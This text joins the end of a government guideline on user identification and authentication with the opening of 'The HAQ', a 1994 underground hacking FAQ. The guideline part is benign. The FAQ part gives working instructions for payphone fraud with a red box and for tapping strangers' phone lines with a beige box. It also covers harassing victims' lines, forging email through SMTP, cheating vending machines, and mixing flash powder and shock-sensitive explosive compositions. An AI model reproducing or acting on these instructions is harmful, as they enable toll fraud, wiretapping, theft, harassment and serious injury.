system will require.  One goal in the design of an authentication
system should be to minimize the maintenance requirements within
the constraints of system cost, performance, and available
technology.

4.2.5  Commercial availability 

     Large-scale networking of computer systems and distributed
computing are relatively recent developments, and are the driving
forces behind the need for more effective methods for
authenticating system users.  Unfortunately, the market for
advanced authentication technology is not fully developed and
is somewhat unstable.  Many commercially available authentication
systems have not yet been sold in quantity.  An organization that
is considering the use of this technology should evaluate the
vendor's ability to produce systems that meet specific quality
control standards and in sufficient quantity to meet the user's
requirements.  Contracts written to procure authentication
systems should provide some form of protection for the customer
in the event that the vendor is unable to produce systems in the
quantities required.   

4.2.6  Upgradeability 

     Because the technology of advanced authentication systems is
continually developing, any authentication system should be able
to accommodate the replacement of outdated components with new
ones.  A modular approach to the design of an authentication
system, with clearly defined interfaces between the system
components, facilitates the process of upgrading to new
technology.

4.2.7  System Integration 

     The integration of an authentication system into an existing
computer environment can be very difficult.  Most operating
systems do not contain well-defined entry points for replacing
the default authentication mechanism supplied with the operating
system.  This is partly because there is no widely accepted
standard for the interface between an operating system and an
authentication device.  Until such a standard becomes available,
there are three general options: 

In some cases, the vendor who provides the authentication system
may have already integrated it into certain operating systems. 
If the authentication system meets the requirements of the
customer and the customer is using the specified operating
system, then the system integration has already been
accomplished.  

Operating system vendors may select certain security
architectures for incorporation into their systems.  If these
architectures include an authentication technology which the
customer finds acceptable, then the operating system may be
purchased with the appropriate authentication mechanism as part
of the package.

It may be necessary to customize the authentication system and
perhaps modify the host operating system so that the two can
communicate.  This will involve cooperation between the operating
system vendor, the authentication system vendor, and the
customer, unless the customer has sufficient expertise to perform
the integration in-house.  A prototyping approach is strongly
recommended, due to the complexity of this type of project. 
Implementing such a system on a small scale first can be very
helpful in determining what problems will be encountered in a
full-scale implementation. 

5    Cost

     As in other aspects of IT security, the specific cost of
enforcing Identification and Authentication should be balanced
against the value of the information processed on an IT system
and the vulnerability of that information to attack.  In general,
devices with a higher performance level will cost more, but
individual cases should be evaluated carefully. The
authentication systems described in this chapter provide a range
of cost from password-only systems at the low end to biometrics
at the high end.  Token systems, such as memory cards and smart
cards, fall inside the range.

     In assessing the cost of an authentication system there are
several issues to consider.  The first is the actual cost to
purchase and install the required equipment and software.  In
general there is no additional cost to purchase a password system
because they are included with most IT systems.  Programs that
check for good passwords, an important part of using a password
system, do cost additional money.  The use of memory cards is
quite extensive and the use of smart cards is increasing
significantly so the costs associated with these technologies
will decrease over time.  The application of biometrics is not
that extensive so costs are comparatively higher.  Managers
should keep in mind that similar products from different vendors
may vary widely in cost, depending on the vendor's manufacturing
and development techniques and marketing philosophies.    

     In addition to the cost of procuring authentication
technology, there is the cost to the organization involved in
using that technology.  This includes on-going training of staff
in the correct use of the technology as well as the training and
time of personnel to administer the authentication system.

     While the relationship between cost and performance can
appear complex for authentication technology, the general
approach should be to procure the authentication system which  
provides the required level of security and other performance
factors at a minimum cost.

6    Interdependencies

6.1  Security Management & Administration

     The incorporation of a new or improved user authentication
system will have a noticeable effect throughout an organization. 
To ensure the acceptance and success of such a program, careful
management of the change should take place throughout the
organization.

6.2  Cryptography

     Cryptography plays a role in identification and
authentication in two ways. The first is a supporting role for
each of the other forms of authentication.  Cryptography can
provide for the security of authentication data both while it is
stored in a computer as well as while it is being transmitted
between.  In addition, cryptography can be used itself as an
authentication method.

6.3  Risk Management

     A thorough analysis can be done to determine what parts of
an organization's IT system are vulnerable to a login attack, and
to prioritize these vulnerabilities in terms of severity and
likelihood.  The types of authentication technology used should
be appropriate for the risk at hand.  Not all systems may require
identification and authentication, e.g., public access systems.

6.4  Personnel

     The types of identification and authentication methods used
by an organization should be chosen in a context that includes
personnel considerations.  This will help determine what measures
will work best for an organization's employees.  It is important
to note that the cooperation of an organization's staff is very
bit as important as the technology to provide identification and
authentication.

6.5  Audit

     Identification and authentication provide the basis for
auditing in an IT system.  By tying actions of a user to a unique
identification, individuals may be held accountable for their
actions.

7   References

CSC-STD-002-85, Department of Defense Password Management
Guideline, April 12, 1985.

FIPS PUB 48, Guidelines on Evaluation of Techniques for Automated
Personal Identification, U.S. Department of Commerce, National
Bureau of Standards, Washington, D.C., April 1, 1977.

FIPS PUB 83, Guideline on User Authentication Techniques for
Computer Network Access Control, U.S. Department of Commerce,
National Bureau of Standards, Washington, D.C., September 29,
1980.

FIPS PUB 113, Computer Data Authentication, U.S. Department of
Commerce, National Bureau of Standards, Washington, D.C., May 30,
1985.

Feldmeier, David C. and Philip R. Karn, UNIX Password Security -
Ten Years Later, Crypto '89 Abstracts, Santa Barbara, CA, August
20-24, 1989.

FIPS PUB 112, Password Usage, U.S. Department of Commerce,
National Bureau of Standards, Washington, D.C., May 30, 1985.

Haykin, Martha E., and Robert B. J. Warnar, Smart Card
Technology: New Methods for Computer Access Control, NIST Special
Publication 500-157, U.S. Department of Commerce, National
Institute of Standards and Technology, Washington, D.C.,
September 1988.

R. Morris and K. Thompson, Password Security: A Case History,
Communications of the ACM, Vol. 22, No. 11, November 1979, pp.
594-597.

R. M. Needham and M. D. Schroeder, Using Encryption for
Authentication in Large Networks of Computers, Communications of
the ACM, Vol. 21, No. 12, December 1978, pp. 993-999.

Smid, Miles, James Dray and Robert B. J. Warnar, A Token Based
Access Control System for Computer Networks, Proceedings 12th
National Computer Security Conference, October 1989.

Steiner, J.G., Neuman, C., and Schiller, J.I., Kerberos: An
Authentication Service for Open Network Systems, Proceedings
Winter USENIX, Dallas, Texas, February 1988, pp. 191-202.

Troy, Eugene F., Security for Dial-Up Lines, NBS Special
Publication 500-137, U.S. Department of Commerce, National Bureau
of Standards, Washington, D.C., May 1986.

CCITT Recommendation X.509, The Directory - Authentication
Framework, November 1988, (Developed in collaboration, and
technically aligned, with ISO 9594-8).

ANSI X9.26-1990, American National Standard for Financial
Institution Sign-On Authentication for Wholesale Financial
Transactions, American Bankers Association, Washington, D.C.,
Approved February 28, 1990.

Sidebar Notes

(1)  Sec. 1, para 1:  The process of verifying the identity of an
IT system user is referred to as identification and
authentication.

(2)  Sec. 1, para 2:  Many new technologies offer significant
increases to the protection afforded by password-only systems.

(3)  Sec. 3.1.1, para 3:  Passwords will be more difficult to
guess or obtain illicitly when combined or misspelled words are
used and when a minimum length requirements for passwords is met.

(4)  Sec. 3.1.1, para 2:  The use of passwords as a means of
access control to IT systems can result in a proliferation of
passwords that reduces overall IT system security.

(5)  Sec 3.2, para 1:  A memory card authenticates a user's
identity based on a unique card used in conjunction with
something known to the user, such as a PIN.

(6)  Sec. 3.2, para 3:  Common types of memory cards are
telephone calling cards, credit cards, and ATM cards.

(7)  Sec. 3.3, para 1:  Smart cards, which contain one or more
integrated chips, can provide increased functionality and
increased security over memory cards. 

(8)  Sec 3.4, para 1:  A hand-held password generator is a state-
of-the-art device about the size of a shirt-pocket calculator
that is used to access an IT system in place of the traditional
user name and password.

(9)  Sec. 3.5, para 1:  Biometric authentication systems operate
based on unique physical attributes of users, such as voice
patterns, fingerprints, and hand geometry; however, the
technology is less mature than that for memory and smart cards.

(10) Sec. 3.6, para 1:  Cryptography can be the basis for an
authentication system; or it can be used in conjunction with
other system discussed. 

(11) Sec. 4.2.1:  In choosing an authentication system, managers
should explore information provided by vendors, at IT security
conferences and presentations, and in special publications.

(12)  Sec. 4.2.7:  Important considerations in choosing an
authentication system include accuracy, reliability,
maintainability, commercial availability, upgradeability, and
system integration.



The HAQ Edition 2.07 (June 11, 1994)

OK, it's a bit old but it *DOES* contain some valid information on UNIX
and Internet hacking... At least it's not as old as the Jolly Roger Cookbook
:), enjoy ppl

-=*( Prophet )*=-

**
Jun 13, 1994 19:54 from Belisarius

 _____________
/      /     /             ***     ***      ******       ******
      /                     ***     ***    *********    *********
     /       /               ***     ***  ***     ***  ***     ***
    /       /                 ***********  ***********  ***     ***
   /       /_____    ______    ***********  ***********  ***  ** ***
  /       /     /   /_____/     ***     ***  ***     ***  ***   *****
 /       /     /   /             ***     ***  ***     ***   ***********
/       /     /   /______         ***     ***  ***     ***   *****   ***

                          +---------------+
                          |    THE HAQ    |
                          | Edition  2.07 |
                          |  11 JUN 1994  |
                          +---------------+

                 "Knowledge is power" --Francis Bacon
              "United we stand, divided we fall" --Aesop

=+=+=+=+=+=+=+=+=+= HACK-FAQ!  Non-Copyright Notice =+=+=+=+=+=+=+=+=
=                                                                   =
+      MatrixMage Publications.       1994    No rights reserved.   +
=                                                                   =
+ This file may be redistributed provided that the file and this    +
= notice remain intact. This article may not under any              =
+ circumstances be resold or redistributed for compensation of any  +
= kind.  Distribution of THE HACK-FAQ! is encouraged and promoted.  =
+                                                                   +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

                        <*>  Edited by  <*>

                        # Editor-in-Chief #
               Belisarius < temporary loss of E-mail >
          can be reached on ISCA, Shadow, SkyNET, Brinta and
         Baltimore 2600 Meetings and other nameless locations.

                # Asst.  Editor (non communicado) #
               Neurophire (on Shadow and N P on ISCA)

                A MatrixMage Electronic Publication

Special Thanks to the Following Contributors:
Z Maestro     RA of ISCA Underground>
DINO          RA of Shadow Hack and Crack>
Artimage      RA of SKYNET Underground>

Faunus        Revolution        Miska               Informatik
Matrixx       Amarand           Crypto Steelyhart   aBBa / PfA
Beelzebub     Redbeard          Squarewave
IO            CyberSorceror     Caustic
Doktor Nil    Skipster          Walrus
CPT Ozone     Abort             Kyoti
Carsenio      Aero              Phrack

AND NOW A WORD FROM YOUR EDITOR:

     Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods.  This belief in mysticism persisted throughout
the ages (and still does today).  Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods.  But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered.  The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church.  But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work.  The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
     So are 'hackers' the same today.  We surf the nets seeking
knowledge and information (and hopefully understanding).  Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world.  The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before.  This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
     We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be.  This is why I have
started this publication.  We are the MatrixMages!  Our mission is
to learn and to pass on that knowledge.

                                      -=> Belisarius <=-
*********************************************************************
What is 'Cyberpunk' and the Underground?

"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby.  It gets stored, and copied, and sent out all
over the world, and people read it.  It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace.  Eventually somebody uses it, and I know that I have the
power to change the world.  Somewhere, someplace, somebody changed
something using information I changed or created.  I helped to
change the world."  --Unknown

That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture.  Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote.  And, as the quote says, they will
help spread it.  Somewhere, somehow, that quote will change the
world.

But only if you work to change it.  Remember that information and
knowledge a powerful commodities.  He who has information cannot
be beaten.  So above all the most important thing to do in the
"Underground" is to gather information.  This means that you have to
work and put in some effort.  You don't get something' for nothing!
So work hard and together we can change the world!

Keep up with latest editions.  (Sorry there haven't been many lately
but exams and not failing out took precedence!)

The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.

*********************************************************************
                              CONTENTS
*********************************************************************
Sections
   I. Phone Fun
       (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  II. Fake E-Mail
       (Fooling UUCP)
 III. Social Engineering
       (Free sodas, Dumpster Diving, ATMs, Carding)
  IV. The Big Bang
       (Making Weapons and Explosives)
   V. Infection
       (Virii, Trojans, Worms and other creepy crawlies)
  VI. NEWBIES READ THIS
       (Basic Hacking)
 VII. Screwing with the most widespread operating system on the net
       (UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
       (VAX/VMS Hacking)
  IX. Screwing with the most widespread operating system on PCs
       (MS-DOS Hacks)
   X. Finding out what that encrypted info is
       (Cracking programs)
  XI. How do I keep my info secure
       (PGP / Cryptology)
 XII. Chemistry 101
       (explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
       (Underground electronics)
 XIV. Watching television
       (cable, Pay-Per-View(PPV), scrambling)
  XV. Tuning in to what's on the radio waves
       (Radios and Scanning)

Appendices
   A. FTP sites with useful info
   B. Interesting Gophers
   C. Informative USENET Newsgroups
   D. Publications and Zines
   E. Books
   F. Files and Papers
   G. Cataglogs
   H. PGP Keys
*********************************************************************

=====================================================================
I. Phone Fun
     (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)

WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)

First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.

What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
  below)
- A solder gun.
- Someone who can point out the crystal in the Tone
  Dialer.

Instructions:
1) Open up the back of the tone dialer. Use screwdriver.

2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar.  It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.

3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.

4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.

5) Put cover back on. you are done.

How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.

To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key.  Call 1-800-DIGIKEY
(1-800-344-4539) for more info.  The part order number from
DIGI-KEY is x-415-ND

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s

Here are the freqs for a red box:

$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
     with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
     millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT.  COCOT
is a general term for Customer owned or "Bell-independent" phone
companies.  Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free.  Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free.  OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
          clips, ratchet wrench, 7/16-inch hex head

 1. Cut the head off one end of the phone cord.
 2. Strip the coating back about two (2) inches.
 3. Look for the red wire, and the green wire.
 4. Mark one clip green and put it on the green.
 5. Mark the other red and put it on the red.
 6. Once you have them soldered and insulated, plug the other end
    (that still has the head) into a phone.
 7. Go out in the daytime and look for green bases, green rectangular
    things sticking about 3 feet out of the ground with a Bell logo on
    the front.  If you're a lamer, you'll waste your time with a
    cable company box or something.  I've heard of it.
 8. Come back to a secluded one at night.  With the wrench, open it
    up.
 9. Find a set of terminals (look like the threaded end of bolts
    in my area) with what should be a red wire and a green wire
    coming off them.
10. Plug in your beige box red to red and green to green, pick up the
    phone and dial away!

Modems work too as well as taps and shit.  You're using someone
else's line (unless you're an idiot) to get phone service.  Don't
abuse the same line after the phone bill comes.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

BEIGE BOXING 101
                         Field Phreaking
                           by Revolution

     At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only".  So why
the hell should I put one here?  Give this file to whoever you want,
just make sure it all stays together, same title, same byline.

     Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced.  Just be ready to bail if you see
sirens.

How to make a beige box: Easiest box to make.  Cut your phone cord
before the jack, strip the wires a little.  You should see a red
(ring) wire and a green (tip) wire.  If you see yellow and black
wires too just ignore them.  Put one set of alligator clips on the
red wire and one on the green wire, and you're set.  (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord?  Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)

How to use: What you have is a lineman's handset.  You can use it
from any bell switching apparatus (from now on sw. ap.).  These are
on phone poles, where your phone line meets your house, and near
payphones.  I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack.  These screws are where you need to attach your alligator
clips to get a dial tone.  Don't unscrew the screw, you'll just
fuck up some poor guys line, and increase your chances of getting
caught.  After the wire goes around the screw, it normally twists
off into the air.  Put your clip on the end of the wire.  Do the
same with the other clip.  If you don't get a dial tone, then
switch terminals.

On telephone poles:

TTI terminals: These must have been built by phreaks, just for
beige boxing.  By far the easiest sw. ap. use.  The only drawback
is that they only connect to one phone line.  These are the fist
sized gray or black boxes that appear where a single phone line
meets the mother line.  They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front.  No bolts or screws to take
off, just snap up the top and you will see four screws.  Clip in
and happy phreaking.  Just click the top down and no one will ever
know you were there (except for the extra digits on their phone
bill.)

Green trees:  just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it.  These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign.  Usually green
trees are right at the base of phone poles, or within a foot or two
of them.  These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off.  Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be.  Ratchet this one off and the metal
sheet will swing open like a door.  On one side of the sheet will
be a paper with a list of #'s this tree connects to.  Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way.  The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.

Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide.  They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts.  I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together.  Also inside
is either pressurized gas or gel.  Pretty messy.

Bell canisters:  attached to phone poles at waist level.  They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off.  Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.

Mother load: Largest sw. ap.  A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground.  a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE".  It opens like a
cabinet with double doors.  Fasteners are located in the center of
the box and on the upper edge in the center.  Both of these are
held on with a 7/16 bolt.  Take the bolts off, and swing the doors
open.  On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to.  And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects
too).

On houses: follow the phone line to someone's house, and then down
there wall.  Either it goes right into there house (then you're
screwed) or it ends in a plastic box.  The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off.  Inside are 4 terminals, yellow,
black, and red and green, the two you need.  Find the Christmas
colors, and phreak out.

On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it.  Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one.  If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above).  Payphones are normally pretty
secure now though, and you probably won't find any of those.

Phreaky things you can do:  Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.

Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line.  Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better:  Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank:  Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his
#)"

That's it.  Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi.  Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail revolution@delphi.com no PGP needed.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)

This service is called ANI.

This number may not work, but try it anyway:
(800) 825-6060

You might want to try is dialing 311 ... a recorded message tells you
your phone #.  Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference.  Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line.  Then call
and set up a teleconference for whenever to be billed to the line
you are calling from.  You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant..

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
(from Token)
Just scroll through your favorite business magazine and look for
800#s.  Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc.  Like on the
INet, most people are too dumb to change their passwd.  If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).

=====================================================================
II. Fake E-mail
     (Fooling UUCP)

HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)

1.  Telnet to port 25 of any internet server
       (eg. telnet site.name.and.address 25)
2.  If at all possible, AVOID TYPING "HELO".
3.  Type: rcpt to (person to receive fake mail){ENTER}
4.  Type: mail from (fake name and address){ENTER}
5.  The mail server should ok each time after each name.
6.  If it does not:
     a) type vrfy and then the name of the person
     b) as a last resort use helo, this will login your computer as
        having been the source of the mail
7.  Retype the commands, it should say ok now.
8.  Type: data{ENTER}
9.  The first line of the message will be the Subject line
10.  Enter your letter
11.  To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
    way.
14. If the person receiving the mail uses a shell like elm he/she
    will not see the telltale fake message warning
    "Apparently-To:(name)" even if not, most people wouldn't know
    what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
    so as to make it look more believable and cover any add-ons the
    mail routine might try
16. Put a realistic mail header in the mail message to throw people
    off even more.  If there are To: and Date: lines then the
    program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
    account.  This works better if you know how to fool it.

=====================================================================
III. Social Engineering
     (Free sodas, Dumpster Diving, ATMs, Carding)

WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas.  It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW ARE THE TRACKS OF ATM CARD ARRANGED?

The physical layout of the cards are standard.  The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution.  There are some generally followed layouts, but not
mandatory.

There are actually up to three tracks on a card.

Track 1:
Designed for airline use.  Contains name and possibly your account
number.  This is the track that is used when the ATM greets you
by name.  There is alot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).

Track 2:
The main operational track for online use.  The first thing
on the track is the Primary Account Number (PAN).  This is usually
pretty standard for all cards.  Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset.  When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY.  This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated).  If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card.  Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card.  Knowing the PIN OFFSET
will not give you the PIN.  This will require the SECRET KEY.

Track 3:
The "OFF-LINE" ATM track.  It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.

=====================================================================
IV. The Big Bang
     (Making Weapons and Explosives)

FLASH POWDERS:
(from Neurophyre)

Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
   nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
   eyes.

 REAL Cherry Bomb Powder
    4 parts by weight of potassium perchlorate
        1 part by weight of antimony trisulfide
        1 part by weight aluminum powder

 Relatively Safe
    3 parts by weight of potassium permanganate
    2 parts by weight of aluminum powder

 *VERY* Shock/Friction/Static/Heat Sensitive!
 Use only if suicidal or desperate!
    4 parts by weight of potassium chlorate
        1 part by weight of sulfur
        1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get.  Use a mortar and
